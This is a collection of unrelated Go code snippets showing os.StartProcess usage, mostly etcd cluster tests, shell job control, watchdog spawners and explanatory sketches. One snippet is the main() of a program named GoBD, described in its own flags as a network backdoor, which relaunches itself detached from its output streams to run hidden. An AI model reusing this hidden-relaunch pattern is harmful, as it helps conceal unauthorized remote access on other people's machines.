// Ensure that a new node can join an existing cluster through a follower.
func TestJoinThroughFollower(t *testing.T) {
	procAttr := new(os.ProcAttr)
	procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}

	_, etcds, err := CreateCluster(2, procAttr, false)
	if err != nil {
		t.Fatal("cannot create cluster")
	}
	defer DestroyCluster(etcds)
	time.Sleep(time.Second)

	// node3 joins through the follower (peer port 7002), not the leader.
	newEtcd, err := os.StartProcess(EtcdBinPath, []string{"etcd", "-data-dir=/tmp/node3", "-name=node3", "-addr=127.0.0.1:4003", "-peer-addr=127.0.0.1:7003", "-peers=127.0.0.1:7002", "-f"}, procAttr)
	if err != nil {
		t.Fatal("failed starting node3")
	}
	defer func() {
		newEtcd.Kill()
		newEtcd.Release()
	}()
	time.Sleep(time.Second)

	leader, err := getLeader("http://127.0.0.1:4003")
	if err != nil {
		t.Fatal("failed getting leader from node3:", err)
	}
	if leader != "http://127.0.0.1:7001" {
		t.Fatal("expect=http://127.0.0.1:7001 got=", leader)
	}
}
// Ensure that a node can reply to a version check appropriately.
func TestVersionCheck(t *testing.T) {
	procAttr := new(os.ProcAttr)
	procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}
	args := []string{"etcd", "-n=node1", "-f", "-d=/tmp/version_check"}

	process, err := os.StartProcess(EtcdBinPath, args, procAttr)
	if err != nil {
		t.Fatal("start process failed:" + err.Error())
	}
	defer process.Kill()

	time.Sleep(time.Second)

	// Check a version too small.
	resp, err := http.Get("http://localhost:7001/version/1/check")
	if err != nil {
		t.Fatal("version check request failed:", err)
	}
	resp.Body.Close()
	if resp.StatusCode != http.StatusForbidden {
		t.Fatal("Invalid version check: ", resp.StatusCode)
	}

	// Check a version too large.
	resp, err = http.Get("http://localhost:7001/version/3/check")
	if err != nil {
		t.Fatal("version check request failed:", err)
	}
	resp.Body.Close()
	if resp.StatusCode != http.StatusForbidden {
		t.Fatal("Invalid version check: ", resp.StatusCode)
	}

	// Check a version that's just right.
	resp, err = http.Get("http://localhost:7001/version/2/check")
	if err != nil {
		t.Fatal("version check request failed:", err)
	}
	resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		t.Fatal("Invalid version check: ", resp.StatusCode)
	}
}
// Handle system signals.
// Listen for system signals and restart or stop the service accordingly.
// Note that SIGKILL and SIGSTOP cannot actually be caught; registering them
// with signal.Notify is a silent no-op.
func trapSignal(server client.Encoder) {
	sch := make(chan os.Signal, 10)
	signal.Notify(sch, syscall.SIGTERM, syscall.SIGKILL, syscall.SIGINT,
		syscall.SIGHUP, syscall.SIGSTOP, syscall.SIGQUIT)
	go func(ch <-chan os.Signal) {
		sig := <-ch
		server.Shutdown("signal received " + sig.String() + ", at: " + time.Now().String())
		if sig == syscall.SIGHUP {
			server.Info("autoencode restart now...")
			procAttr := new(os.ProcAttr)
			procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}
			procAttr.Dir = os.Getenv("PWD")
			procAttr.Env = os.Environ()
			process, err := os.StartProcess(os.Args[0], os.Args, procAttr)
			if err != nil {
				server.Info("autoencode restart process failed:" + err.Error())
				return
			}
			waitMsg, err := process.Wait()
			if err != nil {
				server.Info("autoencode restart wait error:" + err.Error())
			}
			server.Info(waitMsg)
		} else {
			server.Info("autoencode shutdown now...")
		}
	}(sch)
}
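// Below is a minimal, self-contained sketch of the same SIGHUP re-exec pattern,
// without the client.Encoder dependency. It is an illustration, not part of the
// original service; the log messages and the one-shot structure are assumptions.
package main

import (
	"log"
	"os"
	"os/signal"
	"syscall"
)

func main() {
	sch := make(chan os.Signal, 1)
	signal.Notify(sch, syscall.SIGHUP, syscall.SIGINT, syscall.SIGTERM)

	sig := <-sch
	log.Printf("signal received: %s", sig)

	if sig == syscall.SIGHUP {
		// Re-exec the current binary with the same arguments and environment,
		// exactly as trapSignal does above.
		attr := &os.ProcAttr{
			Dir:   os.Getenv("PWD"),
			Env:   os.Environ(),
			Files: []*os.File{nil, os.Stdout, os.Stderr},
		}
		proc, err := os.StartProcess(os.Args[0], os.Args, attr)
		if err != nil {
			log.Fatalf("restart failed: %v", err)
		}
		log.Printf("restarted as pid %d", proc.Pid)
	}
}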
// Create a five-node cluster.
// Kill all the nodes and restart them.
func TestMultiNodeKillAllAndRecovery(t *testing.T) {
	procAttr := new(os.ProcAttr)
	procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}

	clusterSize := 5
	argGroup, etcds, err := CreateCluster(clusterSize, procAttr, false)
	defer DestroyCluster(etcds)
	if err != nil {
		t.Fatal("cannot create cluster")
	}

	c := etcd.NewClient(nil)
	c.SyncCluster()

	time.Sleep(time.Second)

	// send 10 commands
	for i := 0; i < 10; i++ {
		// Test Set
		_, err := c.Set("foo", "bar", 0)
		if err != nil {
			panic(err)
		}
	}

	time.Sleep(time.Second)

	// kill all
	DestroyCluster(etcds)

	time.Sleep(time.Second)

	stop := make(chan bool)
	leaderChan := make(chan string, 1)
	all := make(chan bool, 1)

	time.Sleep(time.Second)

	for i := 0; i < clusterSize; i++ {
		etcds[i], err = os.StartProcess(EtcdBinPath, argGroup[i], procAttr)
		if err != nil {
			t.Fatal("cannot restart node:", err)
		}
	}

	go Monitor(clusterSize, 1, leaderChan, all, stop)

	<-all
	<-leaderChan

	result, err := c.Set("foo", "bar", 0)
	if err != nil {
		t.Fatalf("Recovery error: %s", err)
	}
	if result.Node.ModifiedIndex != 16 {
		t.Fatalf("recovery failed! [%d/16]", result.Node.ModifiedIndex)
	}
}
func tryLockAndRun(p params) {
	// Open (or create) the lock file.
	file, err := os.OpenFile(p.lockFilename, os.O_CREATE|os.O_RDWR, 0666)
	if err != nil {
		log.Fatalf("Unable to write lockfile: %s", p.lockFilename)
	}

	// Try to acquire an exclusive, non-blocking lock on the file.
	attempts := 0
	for {
		attempts++
		err = syscall.Flock(int(file.Fd()), syscall.LOCK_EX|syscall.LOCK_NB)
		if err == nil {
			if p.verbose {
				log.Printf("Locking...")
			}
			break
		}
		if !p.wait {
			fmt.Printf("ERROR: cannot launch %s - run is locked\n", "TODO")
			os.Exit(1)
		}
		if p.verbose {
			log.Printf("Attempt %d failed - sleeping %d seconds", attempts, p.sleep)
		}
		time.Sleep(time.Duration(p.sleep) * time.Second)
		if attempts >= p.retries {
			fmt.Printf("ERROR: cannot launch %s - run is locked (after %d attempts)\n", "TODO", attempts)
			os.Exit(1)
		}
	}

	var procAttr os.ProcAttr
	procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}

	// Resolve the command on PATH; fall back to the literal name.
	command, err := exec.LookPath(p.commandInfo[0])
	if err != nil {
		command = p.commandInfo[0]
	}

	process, err := os.StartProcess(command, p.commandInfo, &procAttr)
	if err != nil {
		fmt.Printf("ERROR: %s\n", err)
	} else {
		if _, err := process.Wait(); err != nil {
			fmt.Printf("ERROR: %s\n", err)
		}
	}

	log.Printf("Finish!")
}
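// A minimal, self-contained sketch isolating the non-blocking flock pattern
// used by tryLockAndRun above. The lock file path is a placeholder and the
// single-attempt handling is an assumption (the original retries); Unix-only.
package main

import (
	"fmt"
	"os"
	"syscall"
)

func main() {
	f, err := os.OpenFile("/tmp/demo.lock", os.O_CREATE|os.O_RDWR, 0666)
	if err != nil {
		panic(err)
	}
	defer f.Close()

	// LOCK_EX asks for an exclusive lock; LOCK_NB makes the call return an
	// error immediately instead of blocking when another process holds it.
	if err := syscall.Flock(int(f.Fd()), syscall.LOCK_EX|syscall.LOCK_NB); err != nil {
		fmt.Println("another instance is running:", err)
		os.Exit(1)
	}
	fmt.Println("lock acquired; held until the process exits or unlocks")
}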
func restartSecondary(wdPID int) (*os.Process, error) {
	argv := []string{"./elevApp", strconv.Itoa(1), strconv.Itoa(wdPID)} // 1 = START_SECONDARY
	attr := new(os.ProcAttr)
	attr.Files = []*os.File{nil, os.Stdout, os.Stderr}
	proc, err := os.StartProcess("elevApp", argv, attr)
	return proc, err
}
func restartSecondary(wdPID int) (*os.Process, error) {
	argv := []string{"./main", strconv.Itoa(1), strconv.Itoa(wdPID)} // 1 = START_SECONDARY
	attr := new(os.ProcAttr)
	attr.Files = []*os.File{nil, os.Stdout, os.Stderr}
	// need struct to keep track of the PIDs
	proc, err := os.StartProcess("main", argv, attr)
	return proc, err
}
func (s *Session) Open(t int) *Error {
	if s.IsOpen() {
		return nil
	}

	s.Type = t
	s.Args = s.BuildTranscodeCommand()
	log.Printf("Opening transcoder session: %s", s.Args)

	// create output directory structure
	if err := s.createOutputDirectories(); err != nil {
		return ErrorIO
	}

	// create pipe
	pr, pw, err := os.Pipe()
	if err != nil {
		s.setState(TC_FAILED)
		return ErrorTranscodeFailed
	}
	s.Pipe = pw

	// create logfile
	logname := s.c.Transcode.Log_path + "/" + s.idstr + ".log"
	s.LogFile, _ = os.OpenFile(logname, os.O_WRONLY|os.O_CREATE|os.O_APPEND, utils.PERM_FILE)

	// start transcode process
	var attr os.ProcAttr
	attr.Dir = s.c.Transcode.Output_path + "/" + s.idstr
	attr.Files = []*os.File{pr, s.LogFile, s.LogFile}
	s.Proc, err = os.StartProcess(s.c.Transcode.Command, strings.Fields(s.Args), &attr)
	if err != nil {
		log.Printf("Error starting process: %s", err)
		s.setState(TC_FAILED)
		pr.Close()
		pw.Close()
		s.LogFile.Close()
		s.Pipe = nil
		s.Type = 0
		s.Args = ""
		return ErrorTranscodeFailed
	}

	// close read-end of pipe and logfile after successful start
	pr.Close()
	s.LogFile.Close()

	// set timeout for session cleanup
	s.Timer = time.AfterFunc(time.Duration(s.c.Server.Session_timeout)*time.Second, func() { s.HandleTimeout() })

	// set state
	s.setState(TC_RUNNING)
	return nil
}
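// A stripped-down sketch of the descriptor wiring in Session.Open above: the
// child reads stdin from the read end of a pipe while stdout and stderr share
// a log file. The command (/bin/cat) and file paths are placeholders; Unix-only.
package main

import (
	"fmt"
	"os"
)

func main() {
	pr, pw, err := os.Pipe()
	if err != nil {
		panic(err)
	}
	logFile, err := os.OpenFile("/tmp/child.log", os.O_WRONLY|os.O_CREATE|os.O_APPEND, 0644)
	if err != nil {
		panic(err)
	}

	// Files[0], Files[1], Files[2] become the child's stdin, stdout, stderr.
	attr := &os.ProcAttr{Files: []*os.File{pr, logFile, logFile}}
	proc, err := os.StartProcess("/bin/cat", []string{"cat"}, attr)
	if err != nil {
		panic(err)
	}

	// The child holds its own copies of these descriptors, so the parent can
	// close the read end and the log file, keeping only the write end.
	pr.Close()
	logFile.Close()

	fmt.Fprintln(pw, "hello child") // flows through the pipe into the child's stdin
	pw.Close()                      // EOF lets cat exit
	proc.Wait()
}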
/*
FUNCTION: func main()
RETURNS: Nothing
ABOUT: The main loop of program execution. Allows for retrieving of flags
and initiation of the client / server.
*/
func main() {
	// flags
	modePtr := flag.String("mode", "client", "The mode of the application, may either be client or server. Defaults to client.")
	ipPtr := flag.String("ip", "127.0.0.1", "The ip to connect to if in client mode.")
	portPtr := flag.Int("port", 3322, "The port to connect to in client mode, or to listen on in server mode. Defaults to 3322.")
	interfacePtr := flag.String("iface", "wlan0", "The interface for the backdoor to monitor for incoming connections. Defaults to wlan0.")
	lPortPtr := flag.Int("lport", 3321, "The port for the client to listen on.")
	hiddenPtr := flag.String("visible", "true", "Determines whether the server will be hidden or not. true for visible and false for invisible.")
	dstMacPtr := flag.String("dMac", "", "Destination mac of the outgoing connection.")
	flag.Parse()

	destmac, _ = net.ParseMAC(*dstMacPtr)
	localip = GetLocalIP()
	localmac = GetLocalMAC(*interfacePtr)

	// In hidden server mode, relaunch ourselves detached from stdout/stderr
	// and exit the visible parent process.
	if *hiddenPtr == "false" && *modePtr == "server" {
		var procAttr os.ProcAttr
		procAttr.Files = []*os.File{os.Stdin, nil, nil}
		arguments := make([]string, 7)
		arguments[0] = ""
		arguments[1] = fmt.Sprintf("-mode=%s", *modePtr)
		arguments[2] = fmt.Sprintf("-ip=%s", *ipPtr)
		arguments[3] = fmt.Sprintf("-port=%d", *portPtr)
		arguments[4] = fmt.Sprintf("-iface=%s", *interfacePtr)
		arguments[5] = fmt.Sprintf("-lport=%d", *lPortPtr)
		arguments[6] = fmt.Sprint("-visible=invalid")
		if runtime.GOOS == "windows" {
			_, err := os.StartProcess("GoBD", arguments, &procAttr)
			checkError(err)
		} else {
			_, err := os.StartProcess("./GoBD", arguments, &procAttr)
			checkError(err)
		}
		return
	}

	intiateTools()
	intiateHandles(*interfacePtr)

	switch *modePtr {
	case "client":
		fmt.Printf("Running in client mode. Connecting to %s at port %d.\n", *ipPtr, *portPtr)
		pType = CLIENT
		intiateClient(*ipPtr, uint16(*portPtr), uint16(*lPortPtr))
	case "server":
		fmt.Printf("Running in server mode. Listening on %s at port %d\n", GetLocalIP(), *portPtr)
		pType = SERVER
		beginListen(*ipPtr, uint16(*portPtr), uint16(*lPortPtr))
	}
}
// This test creates a single node and then sets a value on it.
// Then this test kills the node, restarts it, and tries to get the value again.
func TestSingleNodeRecovery(t *testing.T) {
	procAttr := new(os.ProcAttr)
	procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}
	args := []string{"etcd", "-name=node1", "-data-dir=/tmp/node1"}

	process, err := os.StartProcess(EtcdBinPath, append(args, "-f"), procAttr)
	if err != nil {
		t.Fatal("start process failed:" + err.Error())
	}

	time.Sleep(time.Second)

	c := etcd.NewClient(nil)
	c.SyncCluster()

	// Test Set
	result, err := c.Set("foo", "bar", 100)
	if err != nil {
		t.Fatal(err)
	}
	node := result.Node
	if node.Key != "/foo" || node.Value != "bar" || node.TTL < 95 {
		t.Fatalf("Set 1 failed with %s %s %v", node.Key, node.Value, node.TTL)
	}

	time.Sleep(time.Second)

	process.Kill()

	process, err = os.StartProcess(EtcdBinPath, args, procAttr)
	defer process.Kill()
	if err != nil {
		t.Fatal("start process failed:" + err.Error())
	}

	time.Sleep(time.Second)

	result, err = c.Get("foo", false, false)
	if err != nil {
		t.Fatal("get fail: " + err.Error())
	}
	node = result.Node
	if node.Key != "/foo" || node.Value != "bar" || node.TTL > 99 {
		t.Fatalf("Recovery Get failed with %s %s %v", node.Key, node.Value, node.TTL)
	}
}
func spawnCopy(wdPID int) (*os.Process, error) {
	fmt.Println("Spawning copy of Primary")
	argv := []string{os.Args[0], strconv.Itoa(START_SECONDARY), strconv.Itoa(wdPID)}
	attr := new(os.ProcAttr)
	attr.Files = []*os.File{nil, os.Stdout, os.Stderr}
	proc, err := os.StartProcess("elevApp", argv, attr)
	return proc, err
}
func Command_Update() {
	if runtime.GOOS == "linux" {
		args := []string{"arg1"}
		procAttr := new(os.ProcAttr)
		procAttr.Files = []*os.File{os.Stdin, os.Stdout, os.Stderr}
		if _, err := os.StartProcess("./update_linux.sh", args, procAttr); err != nil {
			fmt.Println(utils.Timestamp() + "!update failed: " + err.Error())
		}
	} else {
		fmt.Println(utils.Timestamp() + "!update works only in production")
	}
}
func spawnCopy() (*os.Process, error) {
	if PRINT_INFO {
		fmt.Println("Spawning copy of ourself")
	}
	argv := []string{os.Args[0], strconv.Itoa(SECONDARY), os.Args[2]}
	attr := new(os.ProcAttr)
	attr.Files = []*os.File{nil, os.Stdout, os.Stderr}
	proc, err := os.StartProcess("main", argv, attr)
	return proc, err
}
func Restart() {
	var attr os.ProcAttr
	attr.Files = []*os.File{os.Stdin, os.Stdout, os.Stderr}
	attr.Sys = &syscall.SysProcAttr{}
	_, err := os.StartProcess(os.Args[0], os.Args, &attr)
	if err != nil {
		_err(err)
	}
	Stop()
}
func execFgCmd(cmd []string, sigStateChanged chan string) {
	cmdStr := strings.Join(cmd, " ")
	// TODO: Extract start process into common function.
	argv0, err := exec.LookPath(cmd[0])
	if err != nil {
		if cmd[0] != "" {
			fmt.Printf("Unknown command: %s\n", cmd[0])
		}
		// Don't execute new process with empty return. Will cause panic.
		sigPrompt <- struct{}{}
		return
	}

	var procAttr os.ProcAttr
	procAttr.Files = []*os.File{os.Stdin, os.Stdout, os.Stderr}
	p, err := os.StartProcess(argv0, cmd, &procAttr)
	if err != nil {
		fmt.Printf("Start process %s %v failed: %v\n", argv0, cmd, err)
	}

	for {
		sigChild := make(chan os.Signal)
		defer close(sigChild)
		// SIGCONT not receivable: https://github.com/golang/go/issues/8953
		// This causes some bugs. Eg. CONT signal not captured by handler means
		// subsequent KILL or STOP signals will be ignored by this handler.
		signal.Notify(sigChild, syscall.SIGTSTP, syscall.SIGINT, syscall.SIGCONT, syscall.SIGKILL)
		defer signal.Stop(sigChild)

		var ws syscall.WaitStatus
		// Ignoring error. May return "no child processes" error. Eg. Sending
		// Ctrl-c on `cat` command.
		wpid, _ := syscall.Wait4(p.Pid, &ws, syscall.WUNTRACED, nil)
		if ws.Exited() {
			break
		}
		if ws.Stopped() {
			jobHandler(wpid, runningState, cmdStr)
			jobHandler(wpid, suspendedState, cmdStr)
			// Return prompt when fg has become bg
			sigPrompt <- struct{}{}
		}
		//if ws.Continued() {
		//	state = contState
		//}
		if ws == 9 { // raw status 9: child killed by SIGKILL
			jobHandler(wpid, killedState, cmdStr)
			break
		}
	}
	p.Wait()
	sigPrompt <- struct{}{}
}
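// A minimal sketch of the wait loop above, using the WaitStatus helpers
// (Exited, Signaled, Stopped) instead of comparing the raw status word to 9.
// The "sleep" command is a placeholder; Unix-only.
package main

import (
	"fmt"
	"os"
	"os/exec"
	"syscall"
)

func main() {
	path, err := exec.LookPath("sleep")
	if err != nil {
		panic(err)
	}
	p, err := os.StartProcess(path, []string{"sleep", "2"}, &os.ProcAttr{
		Files: []*os.File{os.Stdin, os.Stdout, os.Stderr},
	})
	if err != nil {
		panic(err)
	}

	var ws syscall.WaitStatus
	for {
		// WUNTRACED also reports children stopped by SIGTSTP/SIGSTOP.
		wpid, err := syscall.Wait4(p.Pid, &ws, syscall.WUNTRACED, nil)
		if err != nil {
			panic(err)
		}
		switch {
		case ws.Exited():
			fmt.Println(wpid, "exited with status", ws.ExitStatus())
			return
		case ws.Signaled():
			fmt.Println(wpid, "killed by", ws.Signal())
			return
		case ws.Stopped():
			fmt.Println(wpid, "stopped by", ws.StopSignal())
			// a real shell would record the job as suspended here
		}
	}
}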
func startServerWithDataDir(extra []string) (*os.Process, error) {
	procAttr := new(os.ProcAttr)
	procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}

	cmd := []string{"etcd", "-data-dir=/tmp/node1", "-name=node1"}
	cmd = append(cmd, extra...)
	println(strings.Join(cmd, " "))

	return os.StartProcess(EtcdBinPath, cmd, procAttr)
}
func spawnWD(priPID int) (*os.Process, error) {
	fmt.Println("Spawning Watch Dog")
	argv := []string{"wd", strconv.Itoa(priPID)}
	attr := new(os.ProcAttr)
	attr.Files = []*os.File{nil, os.Stdout, os.Stderr}
	proc, err := os.StartProcess("wd", argv, attr)
	return proc, err
}
// This test creates a single node and then sets a value on it.
// Then this test kills the node, restarts it, and tries to get the value again.
func TestSingleNodeRecovery(t *testing.T) {
	procAttr := new(os.ProcAttr)
	procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}
	args := []string{"etcd", "-d=/tmp/node1"}

	process, err := os.StartProcess("etcd", append(args, "-i"), procAttr)
	if err != nil {
		t.Fatal("start process failed:" + err.Error())
	}

	time.Sleep(time.Second)

	etcd.SyncCluster()

	// Test Set
	result, err := etcd.Set("foo", "bar", 100)
	if err != nil {
		t.Fatal(err)
	}
	if result.Key != "/foo" || result.Value != "bar" || result.TTL != 99 {
		t.Fatalf("Set 1 failed with %s %s %v", result.Key, result.Value, result.TTL)
	}

	time.Sleep(time.Second)

	process.Kill()

	process, err = os.StartProcess("etcd", args, procAttr)
	defer process.Kill()
	if err != nil {
		t.Fatal("start process failed:" + err.Error())
	}

	time.Sleep(time.Second)

	results, err := etcd.Get("foo")
	if err != nil {
		t.Fatal("get fail: " + err.Error())
	}

	result = results[0]
	if result.Key != "/foo" || result.Value != "bar" || result.TTL > 99 {
		t.Fatalf("Recovery Get failed with %s %s %v", result.Key, result.Value, result.TTL)
	}
}
func compileAndStart(targetDir string, appName string) (*os.Process, error) {
	var procAttr os.ProcAttr
	procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}

	args := []string{"go", "install", targetDir + appName}
	p, err := os.StartProcess(goDir+"go", args, &procAttr)
	if err != nil {
		fmt.Println(err.Error())
		return p, err
	}
	// Wait for `go install` to finish before launching the freshly built
	// binary; otherwise the start below races against the compile.
	if _, err = p.Wait(); err != nil {
		return p, err
	}

	p, err = os.StartProcess(appBins+appName, nil, &procAttr)
	return p, err
}
// TestSnapshotRestart tests etcd restarts with snapshot file
func TestSnapshotRestart(t *testing.T) {
	procAttr := new(os.ProcAttr)
	procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}
	args := []string{"etcd", "-name=node1", "-data-dir=/tmp/node1", "-snapshot=true", "-snapshot-count=500"}

	process, err := os.StartProcess(EtcdBinPath, append(args, "-f"), procAttr)
	if err != nil {
		t.Fatal("start process failed:" + err.Error())
	}

	time.Sleep(time.Second)

	c := etcd.NewClient(nil)
	c.SyncCluster()

	// issue first 501 commands
	for i := 0; i < 501; i++ {
		result, err := c.Set("foo", "bar", 100)
		node := result.Node
		if err != nil || node.Key != "/foo" || node.Value != "bar" || node.TTL < 95 {
			if err != nil {
				t.Fatal(err)
			}
			t.Fatalf("Set failed with %s %s %v", node.Key, node.Value, node.TTL)
		}
	}

	// wait for a snapshot interval
	time.Sleep(3 * time.Second)

	_, err = ioutil.ReadDir("/tmp/node1/snapshot")
	if err != nil {
		t.Fatal("list snapshot failed:" + err.Error())
	}

	process.Kill()

	process, err = os.StartProcess(EtcdBinPath, args, procAttr)
	if err != nil {
		t.Fatal("start process failed:" + err.Error())
	}
	defer process.Kill()

	time.Sleep(1 * time.Second)

	_, err = c.Set("foo", "bar", 100)
	if err != nil {
		t.Fatal(err)
	}
}
// This test kills the current leader and waits for the etcd cluster to elect
// a new leader, once per node in the cluster.
// It prints out each election time and the average election time.
func TestKillLeader(t *testing.T) {
	procAttr := new(os.ProcAttr)
	procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}

	clusterSize := 5
	argGroup, etcds, err := test.CreateCluster(clusterSize, procAttr, false)
	if err != nil {
		t.Fatal("cannot create cluster")
	}
	defer test.DestroyCluster(etcds)

	stop := make(chan bool)
	leaderChan := make(chan string, 1)
	all := make(chan bool, 1)

	time.Sleep(time.Second)

	go test.Monitor(clusterSize, 1, leaderChan, all, stop)

	var totalTime time.Duration

	leader := "http://127.0.0.1:7001"

	for i := 0; i < clusterSize; i++ {
		fmt.Println("leader is ", leader)
		port, _ := strconv.Atoi(strings.Split(leader, ":")[2])
		num := port - 7001
		fmt.Println("kill server ", num)
		etcds[num].Kill()
		etcds[num].Release()

		start := time.Now()
		for {
			newLeader := <-leaderChan
			if newLeader != leader {
				leader = newLeader
				break
			}
		}
		take := time.Now().Sub(start)

		totalTime += take
		avgTime := totalTime / (time.Duration)(i+1)

		fmt.Println("Leader election time is ", take, "with election timeout", ElectionTimeout)
		fmt.Println("Leader election time average is", avgTime, "with election timeout", ElectionTimeout)
		etcds[num], err = os.StartProcess("etcd", argGroup[num], procAttr)
	}
	stop <- true
}
func execBgCmd(cmd []string, sigStateChanged chan string) {
	cmdStr := strings.Join(cmd, " ")
	argv0, err := exec.LookPath(cmd[0])
	if err != nil {
		if cmd[0] != "" {
			fmt.Printf("Unknown command: %s\n", cmd[0])
		}
		sigPrompt <- struct{}{}
		return
	}

	var procAttr os.ProcAttr
	procAttr.Files = []*os.File{os.Stdin, os.Stdout, os.Stderr}
	p, err := os.StartProcess(argv0, cmd, &procAttr)
	if err != nil {
		fmt.Printf("Start process %s %v failed: %v\n", argv0, cmd, err)
	}

	jobHandler(p.Pid, runningState, cmdStr)
	sigPrompt <- struct{}{}

	//FIXME: Bg processes should not receive keyboard signals sent to fg process.
	for {
		sigChild := make(chan os.Signal)
		defer close(sigChild)
		signal.Notify(sigChild, syscall.SIGCHLD)
		defer signal.Stop(sigChild)

		var ws syscall.WaitStatus
		wpid, _ := syscall.Wait4(p.Pid, &ws, syscall.WUNTRACED, nil)
		if ws.Exited() {
			jobHandler(wpid, doneState, cmdStr)
			break
		}
		if ws.Stopped() {
			jobHandler(wpid, suspendedState, cmdStr)
			sigPrompt <- struct{}{}
		}
		//if ws.Continued() {
		//	state = contState
		//}
		if ws == 9 { // raw status 9: child killed by SIGKILL
			jobHandler(wpid, killedState, cmdStr)
			break
		}
	}
	p.Wait()
	sigPrompt <- struct{}{}
}
func createPlayer(Id int, rparams *RenderParams) NodeResp {
	if rparams.Width <= 0 {
		return NodeResp{false, "width must be positive"}
	}
	if rparams.Height <= 0 {
		return NodeResp{false, "height must be positive"}
	}

	x3dfolder, err := unzipfile(rparams.X3dfile)
	if err != nil {
		return NodeResp{false, "unzip failed:" + err.Error()}
	}
	localx3dfile := x3dfolder + "/*.x3d"
	matches, err := filepath.Glob(localx3dfile)
	if err != nil {
		return NodeResp{false, "x3d in zip failed:" + err.Error()}
	}

	// we have the ports
	rconf := &RenderConf{rparams, 8000 + Id, 8100 + Id, x3dfolder}

	// build up the command
	sargs := []string{
		"progname",
		"-width", strconv.Itoa(rparams.Width),
		"-height", strconv.Itoa(rparams.Height),
		"-streamport", strconv.Itoa(rconf.Sport),
		"-listenerport", strconv.Itoa(rconf.Lport),
		"-x3dfile", matches[0]}
	fmt.Println(sargs)

	procAttr := new(os.ProcAttr)
	procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}
	p, err := os.StartProcess("c:\\langs\\ipromotion\\promorenderer\\promorenderer.exe", sargs, procAttr)
	if err != nil {
		return NodeResp{false, "start process failed:" + err.Error()}
	}
	// strconv.Itoa, not string(p.Pid): converting an int with string() yields
	// the rune with that code point, not its decimal representation.
	fmt.Println("Process " + strconv.Itoa(p.Pid) + " created")
	fmt.Println("started")

	streamlut[Id] = &PlayerConf{rconf, p, time.Now()}
	return NodeResp{true, strconv.Itoa(Id)}
}
func (e *Environment) Spawn(cmd []string, extraVars map[string]string) (*int, error) {
	if len(cmd) == 0 {
		return nil, ErrInvalidCommand
	}

	// lookup the path of the executable
	cmdpath, err := exec.LookPath(cmd[0])
	if err != nil {
		return nil, fmt.Errorf("Cannot find executable %s: %v", cmd[0], err)
	}

	// copy the extra vars so we can mutate it
	vars := make(map[string]string)
	for key, value := range extraVars {
		vars[key] = value
	}

	// start the agent
	sock, err := e.startProxyKeyring()
	if err != nil {
		return nil, err
	}
	vars["SSH_AUTH_SOCK"] = sock

	// start the process
	var attr os.ProcAttr
	attr.Env = e.buildEnviron(vars)
	attr.Files = []*os.File{os.Stdin, os.Stdout, os.Stderr}

	proc, err := os.StartProcess(cmdpath, cmd, &attr)
	if err != nil {
		return nil, fmt.Errorf("Failed to execute command: %v", err)
	}

	// wait for the process to exit
	state, _ := proc.Wait()

	var exitStatus int
	if !state.Success() {
		if status, ok := state.Sys().(syscall.WaitStatus); ok {
			exitStatus = status.ExitStatus()
		} else {
			exitStatus = 255
		}
	}

	// we only return an error if spawning the process failed, not if
	// the spawned command returned a failure status code.
	return &exitStatus, nil
}
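// A compact sketch of the exit-status extraction performed by Spawn above:
// Wait returns an *os.ProcessState whose Sys() value can be asserted to
// syscall.WaitStatus on Unix to recover the numeric code. The "false" command
// (always exits 1) is a placeholder.
package main

import (
	"fmt"
	"os"
	"os/exec"
	"syscall"
)

func main() {
	path, err := exec.LookPath("false")
	if err != nil {
		panic(err)
	}
	proc, err := os.StartProcess(path, []string{"false"}, new(os.ProcAttr))
	if err != nil {
		panic(err)
	}

	state, err := proc.Wait()
	if err != nil {
		panic(err)
	}

	exitStatus := 0
	if !state.Success() {
		if ws, ok := state.Sys().(syscall.WaitStatus); ok {
			exitStatus = ws.ExitStatus()
		} else {
			exitStatus = 255 // same opaque-status fallback as Spawn
		}
	}
	fmt.Println("exit status:", exitStatus)
}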
// Create a five-node cluster.
// Replace one of the nodes with a different peer address.
func TestReplaceWithDifferentPeerAddress(t *testing.T) {
	// TODO(yichengq): find some way to avoid the error that will be
	// caused if some node joins the cluster with the collided name.
	// Possible solutions:
	// 1. Remove itself when executing a join command with the same name
	// and different peer address. However, it should find some way to
	// trigger that execution because the leader may update its address
	// and stop heartbeat.
	// 2. Remove the node with the same name before each join.
	// But this way could be rather overkill.
	t.Skip("Unimplemented functionality")

	procAttr := new(os.ProcAttr)
	procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}

	clusterSize := 5
	argGroup, etcds, err := CreateCluster(clusterSize, procAttr, false)
	if err != nil {
		t.Fatal("cannot create cluster")
	}
	defer DestroyCluster(etcds)

	time.Sleep(2 * time.Second)

	rand.Int()
	for i := 0; i < 10; i++ {
		num := rand.Int() % clusterSize
		fmt.Println("replace node", num+1)

		argGroup[num] = increasePeerAddressPort(argGroup[num], clusterSize)
		argGroup[num] = increaseAddressPort(argGroup[num], clusterSize)
		argGroup[num] = increaseDataDir(argGroup[num], clusterSize)
		// restart
		newEtcd, err := os.StartProcess(EtcdBinPath, append(argGroup[num], "-f"), procAttr)
		if err != nil {
			panic(err)
		}
		etcds[num].Wait()
		etcds[num] = newEtcd
	}

	c := etcd.NewClient(nil)
	c.SyncCluster()
	result, err := c.Set("foo", "bar", 0)
	if err != nil || result.Node.Key != "/foo" || result.Node.Value != "bar" {
		t.Fatal("Failed to set value in etcd cluster")
	}
}
func execute(cmd string, args []string, slen int) {
	var procattr os.ProcAttr
	procattr.Files = []*os.File{os.Stdin, os.Stdout, os.Stderr}

	if path != "" {
		cmd = path + cmd
	}

	proc, err := os.StartProcess(cmd, args, &procattr)
	if err != nil {
		fmt.Println(err)
		return
	}
	proc.Wait()
}
// Ensure that we can start a v2 cluster from the logs of a v1 cluster.
func TestV1ClusterMigration(t *testing.T) {
	path, _ := ioutil.TempDir("", "etcd-")
	os.RemoveAll(path)
	defer os.RemoveAll(path)

